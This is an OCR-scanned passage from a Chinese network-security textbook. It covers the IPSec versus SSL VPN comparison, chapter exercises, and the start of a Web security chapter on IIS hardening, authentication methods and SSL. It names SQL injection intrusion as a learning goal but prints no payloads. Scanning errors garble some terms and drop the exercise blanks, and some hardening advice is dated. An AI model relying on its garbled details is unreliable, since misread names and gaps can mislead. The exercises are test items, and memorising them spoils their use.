95 拓展 提升 : IPSec VPN 与 SSL VPN 的 比较 


SSL VPN 作为 一 种 新 兴 的 VPN 技术 ,与 传统 的 IPSec VPN 技术 各 具 特 色 , 各 有 千秋 。 
SSL VPN 比较 适合 用 于 移动 用 户 的 远程 接 和 人 (ClientSite) ,而 IPSec VPN 则 在 网 对 网 
(Site-Site) 的 VPN 连接 中 具有 先天 优势 。 这 两 种 产品 将 在 VPN 市 场 上 长 期 共存 ,优势 互 
补 。 在 产品 的 表现 形式 上 ,两 者 有 以 下 几 大 差异 。 

(1) SSL VPN 多 用 于 “移动 客户 一 网 ”连接 ,IPSec VPN 多 用 于 “网 一 网 ”连接 。SSL 
VPN 的 移动 用 户 使 用 标准 的 浏览 器 ,无 须 安 装 客户 端 程序 , 即 可 通过 SSL VPN 隧道 接 入 
内 部 网 络 ;而 IPSec VPN 的 移动 用 户 需 要 安装 专门 的 IPSec 客户 端 软件 。 

(2) SSL VPN 是 基于 应 用 层 的 VPN ,而 IPSec VPN 是 基于 网 络 层 的 VPN。IPSec 
VPN 对 所 有 的 IP 应 用 均 透 明 ; 而 SSL VPN 保护 基于 Web 的 应 用 更 有 优势 ,当然 好 的 产品 
也 支持 TCP/UDP 的 C/S 应 用 ,例如 文件 共享 .网 上 邻居 、FTP、Telnet、Oracle 等 。 

(3) SSL VPN 用 户 不 受 上 网 方式 限制 ,SSL VPN 隧道 可 以 穿 透 防火 墙 (Firewall) ;而 
IPSec 客户 端 需要 支持 “NAT 穿 透 功能 才能 穿 透 Firewall, 而 且 需 要 Firewall 打开 UDP 
500 端口 。 

(4) SSL VPN 只 需要 维护 中 心 节点 的 网 关 设备 ,客户 端 免 维护 ,降低 了 部 署 和 支持 费 
用 ;而 IPSec VPN 需要 管理 通信 的 每 个 节点 ,网 管 专业 性 较 强 。 

(5) SSL VPN 更 容易 提供 细 粒 度 访问 控制 ,可 以 对 用 户 的 权限 、 资 源 、 服 务 、 文 件 进行 
更 加 细致 的 控制 ,与 第 三 方 认 证 系统 (如 RADIUS、AD 等 ) 结 合 更 加 便捷 。 而 IPSec VPN 
主要 基于 IP 五 元 组 对 用 户 进行 访问 控制 。 

正 是 出 于 SSL VPN 的 这 些 独 特 优势 ,SSL VPN 越 来 越 被 一 些 客户 所 接受 。 


习 是 


一 、 选 择 题 
1. VPN 主要 采用 4 项 技术 来 保证 安全 ,这 4 项 技术 分 别 是 ( ) 加 解密 技术 、 密 钥 
管理 技术 .用户 与 设备 身份 认证 技术 。 
A. 隧道 技术 B. 代理 技术 C. 防火 墙 技术 D. 端口 映射 技术 
2. 关于 VPN ,以 下 说 法 错误 的 是 ( ) 。 
A. VPN 的 本 质 是 利用 公 网 的 资源 构建 企业 的 内 部 私 网 
B. VPN 技术 的 关键 在 于 隧道 的 建立 
C. GRE 是 第 三 层 隧 道 封装 技术 ,把 用 户 的 TCP/UDP 数据 包 直 接 加 上 公 网 的 IP 
报头 发 送 到 公 网 中 去 
D. L2TP 是 第 二 层 隧 道 技 术 , 可 以 用 来 构建 VPDN(virtual private dial network) 
290 


项 目 9 VPN 技 术 





3. IPSec 是 ( )VPN 协议 标准 。 


A. 第 一 层 B. 第 二 层 C. 第 三 层 D. 第 四 层 
4. IPSec 在 任何 通信 开始 之 前 ,要 在 两 个 VPN 节点 或 网 关 之 间 协 商 建立 ( 和 
A. IP 地 址 B. 协议 类 型 C. 端口 D. 安全 关联 (SA) 


5. 关于 IPSec 的 描述 中 ,错误 的 是 ( ) 。 
A. 主要 协议 是 AH 协议 与 ESP 协议  B. AH 协议 保证 数据 的 完整 性 
C. 只 使 用 TCP 作为 传输 层 协 议 D. 将 网 络 层 改造 为 有 逻辑 连接 的 层 
6. 为 了 避免 第 三 方 偷 看 WWW 浏览 器 与 服务 器 交互 的 敏感 信息 ,通常 需要 ( 》 
A. 采用 SSL 技术 B. 在 浏览 器 中 加 载 数字 证 书 
C. 采用 数字 签名 技术 D. 将 服务 器 放 入 可 信 站 点 区 
二 、 填空 题 
1. VPN 是 实现 在 网 络 上 构建 的 虚拟 专用 网 。 
a 指 的 是 利用 一 种 网 络 协 议 传 输 另 一 种 网 络 协 议 , 也 就 是 对 原始 网 络 信 息 进 
行 再 次 封装 ,并 在 两 个 端点 之 间 通 过 公共 互联 网 络 进行 路 由 ,从 而 保证 网 络 信息 传输 的 安 
全 性 。 
3. AH 协议 提供 了 和 功能 ,但 是 没有 提供 功能 。 
4. ESP 协议 提供 了 S 和 功能 。 
5. 在 SSL 之 上 使 用 的 HTTP 被 称 为 ,其 端口 号 为 3 
、 简 答题 
. 什么 是 VPN? 它 有 何 特点 ? 
. 简 述 VPN 的 处 理 过 程 。 
.VPN 可 分 为 哪 3 种 类 型 ? 
.VPN 的 关键 技术 包括 哪些 ? 
. 什么 是 隧道 技术 ? VPN 隧道 协议 主要 有 哪些 ? 
. IPSec VPN 与 SSL VPN 有 何 区 别 ? 
四 、 操 作 练 习题 
建立 一 个 VPN 连接 到 单位 内 部 网 ,用 户 名 为 test, 密 码 为 test。 





v 
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【项 目 目标 】 


(1) 了 解 Web 站 点 安全 和 浏览 器 安全 。 

(2) 掌握 Web 服务 器 的 安全 配置 方法 。 

(3) 掌握 通过 SSL 访问 Web 服务 器 的 方法 。 

(4) 了 解 脚本 语言 的 安全 性 。 

(5) 掌握 利用 SQL 注入 漏洞 实现 网 站 入 侵 的 方法 。 
(6) 了 解 利用 Unicode 漏洞 实现 网 页 “涂鸦 ”的 方法 。 
(7) 了 解 网 络 钓 鱼 和 防范 的 方法 。 


101 项 目 提出 


张 先生 开办 的 公司 越 来 越 大 ,公司 人 员 也 越 来 越 多 ,为 了 便于 通信 和 交流 , 张 先生 在 公 
司 网 络 内 部 开通 了 论坛 ,论坛 中 只 管理 员 才 有 管理 权限 ,普通 员工 只 能 查看 和 发 表 论 坛 
信息 。 

有 一 天 ,公司 员工 反映 网 络 论坛 被 恶意 更 改 , 公 司 内 部 一 片 哗然 , 张 先生 马上 召集 网 络 
管理 员 ,询问 事件 的 缘由 。 经 初步 调查 分 析 , 在 公司 的 防火 墙 和 入 侵 检 测 系 统 上 均 未 发 现 入 
侵 的 痕迹 ,也 未 发 出 安全 警报 ,那么 网 络 论坛 究竟 是 怎么 被 黑 掉 的 呢 ? 


102 项 目 分 析 


网 络 管理 员 小 李 再 次 认真 分 析 了 网 络 论坛 系统 ,发 现 论坛 系统 采用 了 ASP 十 Access 的 
编程 环境 ,从 IIS 的 日 志 中 发 现 , 黑 客 是 用 正常 的 管理 员 账 户 和 密码 登录 论坛 系统 的 ,那么 
黑客 是 怎么 知道 管理 员 账 户 和 密码 的 呢 ? 

小 李 对 论坛 系统 的 管理 员 登 录 模块 进行 了 仔细 分 析 , 发 现 登 录 模块 没有 对 攻击 者 输入 
的 管理 员 账户 和 密码 等 数据 进行 合法 性 检查 ,而 且 存在 SQL 注入 漏洞 ,使 得 攻击 者 通过 输 
入 一 些 特殊 字符 就 能 成 功 登录 论坛 系统 ,或 利用 SQL 注入 工具 破解 管理 员 账 户 和 密码 。 

找到 原因 后 ,小 李 设置 了 输入 数据 的 合法 性 检查 ,并 修复 了 SQL 注入 漏洞 ,对 Web 服 
务 器 进一步 加 强 了 安全 配置 ,并 采用 了 SSL 安全 协议 。 公 司 的 论坛 系统 又 恢复 了 正常 ,此 
后 论坛 系统 再 也 没有 发 生 过 类 似 的 安全 事件 。 
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103 相关 知识 点 


10.3.1 Web 安全 概述 


随 着 移动 互联 网 、 云 计算 、 大 数据 等 一 系列 新 技术 的 诞生 和 应 用 ,基于 Web 环境 的 互联 
网 应 用 越 来 越 广泛 ,企业 信息 化 的 过 程 中 各 种 应 用 都 架设 在 Web 平 台 上 ,Web 业务 的 迅速 
发 展 也 引起 黑客 们 的 强烈 关注 , 接 是 而 至 的 就 是 Web 安全 威胁 的 凸显 ,黑客 利用 网 站 操作 
系统 的 漏洞 和 Web 服务 程序 的 SQL 注入 漏洞 等 得 到 Web 服务 器 的 控制 权限 , 轻 则 自 改 网 
页 内 容 , 重 则 窃取 重要 内 部 数据 ,更 为 严重 的 则 是 在 网 页 中 植 和 人 恶意 代码 ,使 网 站 访问 者 受 
到 侵害 。 这 也 使 越 来 越 多 的 用 户 关注 应 用 层 的 安全 问题 ,对 Web 应 用 安全 的 关注 度 也 逐渐 
升温 。 

目前 很 多 业务 都 依赖 于 互联 网 ,例如 网 上 银行 网络 购 物 ,网络 游 戏 等 ,很 多 恶意 攻击 者 
出 于 不 良 目的 对 Web 服务 器 进行 攻击 ,想方设法 通过 各 种 手段 获取 他 人 的 个 人 账户 信息 来 
谋取 利益 。 正 是 因为 这 样 ,Web 业务 平台 最 容易 遭受 攻击 。 同 时 ,对 Web 服务 器 的 攻击 也 
可 以 说 是 形形色色 ,种 类 繁多 ,常见 的 有 挂 马 .SQL 注入 缓冲 区 溢出 、 嗅 探 、 利 用 IIS 等 针对 
Web 服务 器 漏洞 进行 攻击 。 

一 方面 ,由 于 TCP/IP 的 设计 是 没有 考虑 安全 问题 的 ,这 使 得 在 网 络 上 传输 的 数据 是 没 
有 任何 安全 防护 的 。 攻 击 者 可 以 利用 系统 漏洞 造成 系统 进程 缓冲 区 溢出 ,攻击 者 可 能 获得 
或 者 提升 自己 在 有 漏洞 的 系统 上 的 用 户 权 限 来 运行 任意 程序 ,甚至 安装 和 运行 恶意 代码 , 窃 
取 机 密 数据 。 而 应 用 层面 的 软件 在 开发 过 程 中 也 没有 过 多 考虑 到 安全 的 问题 ,这 使 得 程序 
本 身 存在 很 多 漏洞 ,诸如 缓冲 区 溢出 、SQL 注入 等 流行 的 应 用 层 攻 击 , 这 些 均 属 于 在 软件 研 
发 过 程 中 朴 忽 了 对 安全 的 考虑 所 致 。 

另 一 方面 ,用 户 对 某 些 隐秘 的 东西 带 有 强烈 的 好 奇 心 , 一 些 利用 木马 或 病毒 程序 进行 攻 
击 的 攻击 者 ,往往 就 利用 了 用 户 的 这 种 好 奇 心理 ,将 木马 或 病毒 程序 拥 绑 在 一 些 艳 丽 的 图 
片 . 音 视频 及 免费 软件 等 文件 中 ,然后 把 这 些 文件 置 于 某 些 网 站 当中 ,再 引诱 用 户 去 单 击 或 
下 载运 行 。 或 者 通过 电子 邮件 附件 和 QQ、MSN 等 即时 聊天 软件 ,将 这 些 拥 绑 了 木马 或 病 
毒 的 文件 发 送 给 用 户 , 利 用 用 户 的 好 奇 心理 引诱 他 们 打开 或 运行 这 些 文件 。 


10.3.2 Internet 的 脆弱 性 


Internet 是 全 球 最 大 、 覆 盖 范 围 最 广 的 计算 机 互联 网 络 ,是 使 用 公共 语言 进行 通信 的 计 
算 机 网 络 。Internet 本 身 是 没有 边界 .没有 国界 的 ,不 属于 任何 一 个 组 织 或 任何 一 个 国家 。 
由 于 在 Internet 上 没有 完善 的 法 律 和 法 规 , 人 们 在 Internet 上 实施 的 行为 几乎 都 是 不 受 限 
制 的 ,这 样 导致 了 Internet 具有 很 多 的 安全 隐患 ,主要 表现 在 以 下 几 个 方面 。 

(1) Internet 是 没有 边界 ,没有 国界 的 .这 给 黑客 们 进行 跨国 攻击 提供 了 方便 。 

(2) 在 Internet 上 ,通过 IP 地 址 来 唯一 识别 网 络 上 的 用 户 , 而 这 种 识别 机 制 是 不 可 靠 
的 。IP 地 址 只 是 一 个 数字 的 标志 ,根本 不 能 代表 用 户 的 真实 身份 ,因此 ,通过 IP 地 址 来 识 
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别 和 管理 用 户 存 在 严重 的 安全 漏洞 。 

(3) Internet 本 身 没 有 中 央 监 控 管 理 机 制 ,没有 完善 的 法 律 和 法 规 , 因 此 无 法 对 通过 
Internet 的 犯罪 进行 有 效 的 处 理 。 

(4) Internet 本 身 没有 审计 和 记录 功能 ,对 发 生 的 事情 没有 记录 ,这 本 身 也 是 一 个 安全 
隐患 。 

(5) Internet 从 技术 上 来 讲 是 开放 的 标准 的 ,是 为 君子 设计 而 不 防 小 人 的 。 





10.3.3 ”Web 的 安全 问题 


随 着 Internet 的 发 展 ,出现 了 基于 3 层 结构 模型 的 Web 技术 ,特别 是 现在 的 B/S 模型 ， 
展示 了 Web 技术 的 巨大 魅力 。Web 技术 是 Internet 技术 的 核心 与 关键 所 在 。 

Internet 的 脆弱 性 同样 也 导致 了 Web 技术 在 应 用 上 存在 不 少 的 安全 问题 。Web 站 点 
的 安全 问题 主要 表现 在 以 下 几 个 方面 。 

(1) 未 经 授权 的 存 取 操作 。 由 于 操作 系统 等 方面 的 漏洞 ,使 未 经 授权 的 用 户 可 以 获得 
Web 服务 器 上 的 秘密 文件 和 数据 ,甚至 可 以 对 Web 服务 器 上 的 数据 进行 修改 、 删 除 ,这 是 
Web 站 点 的 一 个 严重 的 安全 问题 。 

(2) 窃取 系统 的 信息 。 非 法 用 户 侵 入 系统 内 部 ,获取 系统 的 一 些 重 要 信息 ,如 用 户 名 、 
用 户口 令 .加 密 密 钥 等 ,利用 窃取 的 这 些 信息 ,达到 进一步 攻击 系统 的 目的 。 

(3) 破坏 系统 。 对 网 络 系统 .操作 系 统 、. 应 用 程序 等 进行 破坏 。 

(4) 非法 使 用 。 用 户 对 未 经 授权 的 程序 、 命 令 进行 非法 使 用 ,使 他 们 能 够 修改 或 破坏 

(5) 病毒 破坏 。 目 前 ,Web 站 点 面临 着 各 种 各 样 病 毒 的 威胁 。 蠕 虫 特洛伊 木马 ,电子 
邮件 炸弹 、 人 逻辑 炸弹 等 多 种 计算 机 病毒 严重 威胁 着 Web 站 点 的 安全 。 


10.3.4 Web 安全 的 实现 方法 


从 TCP/IP 协议 栈 的 角度 ,实现 Web 安全 的 方法 可 以 划分 为 以 下 3 种 。 

1) 基于 网 络 层 实现 Web 安全 

传统 的 安全 体系 一 般 都 建立 在 应 用 层 上 ,但 是 由 于 在 网 络 层 的 IP 数据 包 本 身 不 具备 任 
何 安 全 特性 ,很 容易 被 查看 、 臭 改 、 伪 造 和 重 传 ,因此 存在 很 大 的 安全 隐患 ,基于 网 络 层 的 
Web 安全 技术 能 够 很 好 地 解决 这 一 问题 。 其 中 .9. 3.6 小 节 中 介绍 的 IPSec 协议 可 提供 基 
于 端 到 端的 安全 机 制 ,可 以 在 网 络 层 上 对 数据 包 进 行 安 全 处 理 , 以 保证 数据 的 机 密 性 和 完整 
性 。 这样, 各 种 应 用 层 的 程序 就 可 以 享用 IPSec 提供 的 安全 服务 和 密 钥 管理 ,而 不 必 设 计 和 
实现 自己 的 安全 机 制 , 因 此 减少 了 密 钥 协商 的 开销 ,降低 了 产生 安全 漏洞 的 可 能 性 。 

2) 基于 传输 层 实现 Web 安全 

也 可 以 在 传输 层 上 实现 Web 安全 .9. 3.6 小 节 中 介绍 的 SSL 协议 就 是 一 种 常见 的 基于 
传输 层 实现 Web 安全 的 解决 方案 。SSL 提供 的 安全 服务 采用 了 对 称 加 密 和 公 钥 加 密 两 种 
加 密 机 制 , 对 Web 服务 器 和 客户 端的 通信 提供 了 机 密 性 、 完 整 性 和 认证 。SSL 协议 在 应 用 
层 协议 通信 之 前 ,就 已 经 完成 加 密 算 法 、 通 信 密 钥 的 协商 ,以 及 服务 器 认证 工作 ,在 此 以 后 应 
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用 层 协议 所 传送 的 数据 都 会 被 加 密 . 从 而 保证 了 通信 的 安全 。 通 过 SSL 实现 安全 通信 的 实 
验 , 将 在 后 面 的 10. 4. 2 小 节 中 介绍 。 

3) 基于 应 用 层 实 现 Web 安全 

这 种 解决 方案 是 将 安全 服务 直接 嵌入 应 用 程序 中 ,从 而 在 应 用 层 实现 通信 安全 ,5.4.2 
小 节 中 介绍 的 PGP 应 用 程序 就 是 一 个 典型 的 例子 ,在 应 用 程序 中 提供 了 机 密 性 、 完 整 性 、 认 
证 和 不 可 否认 性 等 安全 服务 。 


10.3.5 IIS 的 安全 


目前 ,Web 服务 器 软件 有 很 多 ,其 中 IIS(Internet information server, Internet 信息 服 
务 ) 以 其 和 Windows 系统 的 完美 结合 ,得 到 了 广泛 的 应 用 。IIS 作为 一 种 开放 的 服务 ,其 发 
布 的 文件 和 数据 是 无 须 进 行 保护 的 ,但 是 ,IIS 作为 Windows 操作 系统 的 一 部 分 , 却 可 能 由 
于 自身 的 安全 漏洞 导致 整个 Windows 操作 系统 被 攻陷 。 目 前 ,很 多 黑客 正 是 利用 IIS 的 安 
全 漏洞 成 功 实现 了 对 Windows 操作 系统 的 攻击 ,获取 了 特权 用 户 权限 和 敏感 数据 ,因此 加 
强 IIS 的 安全 是 必要 的 。 

1. IIS 安装 安全 

IIS 作为 Windows Server 2008 中 的 一 个 角色 ,可 以 在 “服务 器 管理 器 "中 添加 安装 。 在 
安装 IIS 之 后 ,在 安装 的 计算 机 上 将 默认 生成 ITUSR 的 匿名 账户 ,该 账户 被 添加 到 域 用 户 组 
中 ,从 而 把 应 用 于 域 用 户 组 的 访问 权限 提供 给 访问 IIS 服务 器 的 每 个 匿名 用 户 ,这 不 仅 给 
IIS 带 来 了 很 大 的 安全 隐患 ,还 可 能 威胁 到 整个 域 资源 的 安全 。 因 此 ,要 尽量 避免 把 IIS 安 
装 到 域 控制 器 上 。 

同时 ,在 安装 IIS 的 Web FTP 等 服务 时 ,应 尽量 避免 将 IIS 服务 器 安装 在 系统 分 区 上 。 
把 IIS 服务 器 安装 在 系统 分 区 上 ,会 使 系统 文件 和 IIS 服务 器 文件 同样 面临 非法 访问 ,容易 
使 非法 用 户 入 侵 系 统 分 区 。 

另外 ,避免 将 IIS 服务 器 安装 在 非 NTFS 分 区 上 。 相 对 于 FAT、FAT32 分 区 而 言 ， 
NTFS 分 区 拥有 较 高 的 安全 性 和 磁盘 利用 率 , 可 以 设置 复杂 的 访问 权限 ,以 适应 不 同 信息 服 
务 的 需要 。 

2. 验证 用 户 的 身份 

在 许多 网 站 中 ,大 部 分 WWW 访问 都 是 匿名 的 ,客户 端 请求 时 不 需要 使 用 用 户 名 和 密 
码 , 只 有 这 样 才 可 以 使 所 有 用 户 都 能 访问 该 网 站 。 但 对 访问 有 特殊 要 求 或 者 安全 性 要 求 较 
高 的 网 站 , 则 需要 对 用 户 进 行 身份 验证 。 利 用 身份 验证 机 制 ,可 以 确定 哪些 用 户 可 以 访问 
Web 应 用 程序 ,从 而 为 这 些 用 户 提供 对 Web 网 站 的 访问 权限 。 一 般 的 身份 验证 请 求 需要 
输入 用 户 名 和 密码 来 完成 验证 ,此 外 也 可 以 使 用 诸如 访问 令 牌 等 方式 进行 身份 验证 。 

IIS 7.0 提供 匿名 身份 验证 、 基 本 身份 验证 .摘要 式 身 份 验证 .ASP. NET 模拟 身份 验 
证 ,Forms 身份 验证 ,Windows 身份 验证 和 Active Directory 客户 端 证 书 身份 验证 等 多 种 身 
份 验 证 方法 。 默 认 情 况 下 ,IIS 7. 0 支持 匿名 身份 验证 和 Windows 身份 验证 ,一 般 在 禁止 匿 
名 身份 验证 时 , 才 使 用 其 他 的 身份 验证 方法 。 

各 种 身份 验证 方法 介绍 如 下 。 

(1) 匿名 身份 验证 。 通 常情 况 下 ,. 绝 大 多 数 Web 网 站 都 允许 匿名 访问 , 即 Web 用 户 无 
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须 输 入 用 户 名 和 密码 , 即 可 访问 Web 网 站 。 匿 名 访问 其 实 也 是 需要 身份 验证 的 , 称 为 匿名 
验证 。 在 安装 IIS 时 ,系统 会 自动 建立 一 个 用 来 代表 匿名 账户 的 用 户 账户 (IUSR), 当 用 户 
试图 连接 到 网 站 时 ,Web 服务 器 将 连接 分 配给 Windows 用 户 账户 TUSR, 当 人 允许 匿名 访问 
时 ,就 向 用 户 返 回 网 页 页 面 ;如 果 禁 止 匿名 访问 ,IIS 将 尝试 使 用 其 他 验证 方法 。 对 于 一 般 
的 , 非 敏 感 的 企业 信息 发 布 ,建议 采用 匿名 访问 方法 。 如 果 启 用 了 匿名 验证 , 则 IIS 始终 尝 
试 先 使 用 匿名 验证 对 用 户 进行 验证 ,即使 启用 了 其 他 验证 方法 也 是 如 此 。 

(2) 基本 身份 验证 。 基 本 身份 验证 方法 要 求 提 供用 户 名 和 密码 ,提供 很 低级 别 的 安全 
性 ,最 适用 于 给 需要 很 少 保密 性 的 信息 授予 访问 权限 。 由 于 密码 在 网 络 上 是 以 弱 加 密 的 形 
式 发 送 的 ,这 些 密码 很 容易 被 截取 ,因此 可 以 认为 安全 性 很 低 。 一 般 只 有 确认 客户 端 和 服务 
器 之 间 的 连接 是 安全 时 , 才 使 用 此 种 身份 验证 方法 。 基 本 身份 验证 还 可 以 跨 防火 墙 和 代理 
服务 器 工作 ,所 以 在 仅 允 许 访问 服务 器 上 的 部 分 内 容 而 非 全 部 内 容 时 ,这 种 身份 验证 方法 是 
个 不 错 的 选择 。 

(3) 摘要 式 身 份 验证 。 摘 要 式 身 份 验证 使 用 Windows 域 控 制 器 来 对 请 求 访问 服务 器 
上 的 内 容 的 用 户 进行 身份 验证 ,提供 与 基本 身份 验证 相同 的 功能 ,但 是 摘要 式 身 份 验 证 在 通 
过 网 络 发 送 用 户 凭据 方面 提高 了 安全 性 。 摘 要 式 身份 验证 将 凭据 作为 MD5 哈 希 或 消息 摘 
要 在 网 络 上 传送 (无 法 从 哈 希 中 解密 原始 的 用 户 名 和 密码 ) 。 

(4) ASP. NET 模拟 身份 验证 。 如 果 要 在 ASP. NET 应 用 程序 的 非 默认 安全 环境 中 运 
行 ASP.NET 应 用 程序 ,请 使 用 ASP. NET 模拟 身份 验证 。 在 为 ASP. NET 应 用 程序 启用 
模拟 后 ,该 应 用 程序 将 可 以 在 两 种 环境 中 运行 : 以 已 通过 IIS 7. 0 身份 验证 的 用 户 身份 运 
行 ,或 作为 设置 的 任意 账户 运行 。 例 如 ,如 果 使 用 的 是 匿名 身份 验证 ,并 选择 作为 已 通过 身 
份 验证 的 用 户 运行 ASP. NET 应 用 程序 ,那么 该 应 用 程序 将 在 为 匿名 用 户 设置 的 账户 ( 通 
常 为 IJUSER) 下 运行 。 同 样 ,如 果 选 择 在 任意 账户 下 运行 应 用 程序 , 则 它 将 运行 在 为 该 账 
户 设置 的 任意 安全 环境 中 。 默 认 情 况 下 ,ASP. NET 模拟 处 于 禁用 状态 。 启 用 模拟 后 ， 
ASP. NET 应 用 程序 将 在 通过 IIS 7. 0 身份 验证 的 用 户 的 安全 环境 中 运行 。 

(5) Forms 身份 验证 。Forms 身份 验证 使 用 客户 端 重 定向 来 将 未 经 过 身份 验证 的 用 户 
重 定向 到 一 个 HTML 表单 ,用 户 可 以 在 该 表单 中 输入 凭据 ,通常 是 用 户 名 和 和 密码。 确认 凭 
据 有 效 后 ,系统 会 将 用 户 重 定向 到 他 们 最 初 请 求 的 页 面 。 由 于 Forms 身份 验证 以 明文 形式 
向 Web 服务 器 发 送 用 户 名 和 密码 ,因此 应 当 对 应 用 程序 的 登录 页 面 和 其 他 所 有 页 面 使 用 安 
全 套 接 层 (SSL) 加 密 。 该 身份 验证 非常 适用 于 在 公共 Web 服务 器 上 接收 大 量 请 求 的 站 点 
或 应 用 程序 ,能 够 使 用 户 在 应 用 程序 级 别 的 管理 客户 端 注 册 ,而 无 须 依赖 操作 系统 提供 的 身 
份 验证 机 人 制 。 

(6) Windows 身份 验证 。Windows 身份 验证 使 用 NTLM 或 Kerberos 协议 对 客户 端 
进行 身份 验证 。Windows 身份 验证 最 适用 于 Intranet 环境 。Windows 身份 验证 不 适合 在 
Internet 上 使 用 ,因为 该 环境 下 不 需要 用 户 凭 据 , 也 不 对 用 户 凭据 进行 加 密 。 

(7) Active Directory 客户 端 证 书 身份 验证 。Active Directory 客户 端 证 书 身份 验证 允 
许 使 用 Active Directory 服务 功能 将 用 户 映射 到 客户 证 书 上 ,这 样 便 进行 了 身份 验证 。 将 用 
户 映射 到 客户 证 书 可 以 自动 验证 用 户 的 身份 ,而 无 须 使 用 基本 身份 验证 、 摘 要 式 身 份 验证 或 
Windows 身份 验证 等 其 他 身份 验证 方法 。 

在 实际 应 用 中 ,可 以 根据 不 同 的 安全 性 需要 设置 不 同 的 用 户 身 份 认 证 方法 。 
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3. 访问 权限 控制 

1) NTFS 文件 系统 的 文件 和 文件 夹 的 访问 权限 控制 

如 果 将 Web 服务 器 安装 在 NTFS 分 区 上 ,一 方面 可 以 对 NTFS 文件 系统 的 文件 和 文 
件 夹 的 访问 权限 进行 控制 ,对 不 同 的 用 户 组 和 用 户 授予 不 同 的 访问 权限 。 另 一 方面 ,还 可 以 
利用 NTFS 文件 系统 的 审核 功能 ,对 某 些 特定 用 户 组 成 员 读 写 文件 的 企图 等 方面 进行 审 
核 , 有 效 地 通过 监视 如 文件 访问 .用户 对 象 的 使 用 等 发 现 非法 用 户 进行 非法 活动 的 前 兆 , 以 
及 时 加 以 预防 制止 。 

2) WWW 目录 的 访问 权限 控制 

WWW 服务 除了 提供 NTFS 文件 系统 提供 的 权限 外 ,还 提供 IIS 本 身 提供 的 一 些 权 限 ， 
可 设置 是 否 允许 用 户 读 取 或 浏览 WWW 目录 中 的 文件 。 在 IIS 中 ,选中 相应 的 网 站 ,在 IIS 
区 域 中 可 以 设置 各 种 网 站 的 访问 权限 和 安全 性 ,如 “目录 浏览 “日 志 ” 等 。 

4. IP 地 址 控制 

如 果 使 用 前 面 介绍 的 用 户 身份 验证 方式 ,每 次 访问 站 点 时 都 需要 输入 用 户 名 和 密 
码 ,对 于 授权 用 户 而 言 比较 麻烦 。IIS 可 以 设置 允许 或 拒绝 从 特定 IP 发 来 的 服务 请 求 ,有 
选择 地 允许 特定 节点 的 用 户 访问 Web 服务 ,可 以 通过 设置 来 阻止 除了 特定 IP 地 址 外 的 
整个 网 络 用 户 来 访问 Web 服务 器 。 因 此 ,通过 IP 地 址 来 进行 用 户 控制 是 一 个 非常 有 效 
的 方法 。 

S， 端口 安全 

对 于 IIS 服务 ,无 论 是 Web 站 点 .FTP 站 点 还 是 SMTP 服务 ,都 有 各 自 的 TCP 端口 号 
用 来 监听 和 接收 用 户 浏览 器 发 出 的 请 求 , 一 般 的 默认 端口 号 为 ， Web 站 点 是 80,FTP 站 点 
是 21,SMTP 服务 是 25。 可 以 通过 修改 默认 TCP 端口 号 来 提高 IIS 服务 器 的 安全 性 ,因为 
如 果 修 改 了 默认 端口 号 ,就 只 有 知道 新 端口 号 的 用 户 才能 访问 IIS 服务 器 ,访问 方法 为 
“http:// 网 址 或 IP 地 址 : 新 端口 号 ”, 如 “http://192. 168. 10. 12:8080”。 

6. SSL 安全 

SSL 是 Netscape 公司 为 了 保证 Web 通信 的 安全 而 提出 的 一 种 网 络 安全 通信 协议 。 
SSL 协议 采用 了 对 称 加 密 技 术 和 公 钥 加 密 技 术 , 并 使 用 了 X. 509 数字 证 书 技术 ,实现 了 
Web 客户 端 和 服务 器 端 之 间 数 据 通信 的 保密 性 、 完 整 性 和 用 户 认证 。 

SSL 的 工作 原理 是 : 使 用 SSL 安全 机 制 时 ,首先 在 客户 端 和 服务 器 之 间 建 立 连 接 , 服 务 
器 将 数字 证 书 连同 公开 密 钥 一 起 发 给 客户 端 。 在 客户 端 , 随 机 生成 会 话 密 钥 。 其 次 使 用 从 
服务 器 得 到 的 公开 密 钥 加 密会 话 密 钥 ,并 把 加 密 后 的 会 话 密 钥 在 网 络 上 传送 给 服务 器 。 服 
务 器 使 用 相应 的 私 钥 对 接收 的 加 密 了 的 会 话 密 钥 进 行 解密 ,得 到 会 话 密 钥 。 最 后 ,客户 端 和 
服务 器 端 就 可 以 通过 会 话 密 钥 加 密 通信 的 数据 了 。 这 样 客户 端 和 服务 器 端 就 建立 了 一 个 唯 
一 的 安全 通信 通道 。 

SSL 安全 协议 提供 的 安全 通信 有 以 下 3 个 特征 。 

(1) 数据 保密 性 。 在 客户 端 和 服务 器 端 进行 数据 交换 之 前 ,交换 SSL 初始 握手 信息 ,在 
SSL 握手 过 程 中 采用 了 各 种 加 密 技术 对 其 进行 加 密 , 以 保证 其 机 密 性 和 数据 完整 性 ,并 且 
用 数字 证 书 进行 鉴别 。 这 样 就 可 以 防止 非法 用 户 进行 破译 。 在 初始 化 握手 协议 对 加 密 密 铀 
进行 协商 之 后 ,传输 的 信息 都 是 经 过 加 密 的 数据 。 加 密 算 法 为 对 称 加 密 算法 ,如 DES、 
IDEA、RC4 等 。 
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(2) 数据 完整 性 。 通 过 MD5 .SHA 等 Hash 函数 来 产生 消息 摘要 ,所 传输 的 数据 都 包 
含 数字 签名 ,以 保证 数据 的 完整 性 和 连接 的 可 靠 性 。 

(3) 用 户 身份 认证 。SSL 要 分 别 认证 客户 机 和 服务 器 的 合法 性 ,使 之 能 够 确信 数据 将 
被 发 送 到 正确 的 客户 机 和 服务 器 上 。 通 信 双 方 的 身份 通过 公 钥 加 密 算法 (如 RSA、DSS 等 ) 
实施 数字 签名 来 验证 ,以 防 假冒 。 

通过 IIS 在 Web 服务 器 上 配置 SSL 安全 功能 ,可 以 实现 Web 客户 端 和 服务 器 端的 安 
全 通信 (以 https:// 开 头 的 URL) ,避免 数据 被 中 途 截获 和 算 改 。 对 于 安全 性 要 求 很 高 可 
交互 性 的 Web 网 站 ,建议 采用 SSL 进行 传输 。 


10.3.6 脚本 语言 的 安全 


1. CGI 的 安全 性 

CGI(common gateway interface, 公 用 网 关 接 口 ) 是 Web 服务 器 和 外 部 应 用 程序 之 间 交 
换 数据 的 标准 接口 ,提供 了 一 种 方便 .灵活 的 机 制 ,用 以 扩展 简单 的 建立 在 HTTP 服务 器 上 
的 “获得 文本 并 显示 ?的 功能 ,使 Web 上 的 资源 可 以 随 着 用 户 输入 的 变化 而 变化 ,可 以 通过 
用 户 的 Web 浏览 器 收集 用 户 的 输入 ,发 送 给 Web 服务 器 .并 且 将 这 些 信 息 传 给 外 部 程序 。 
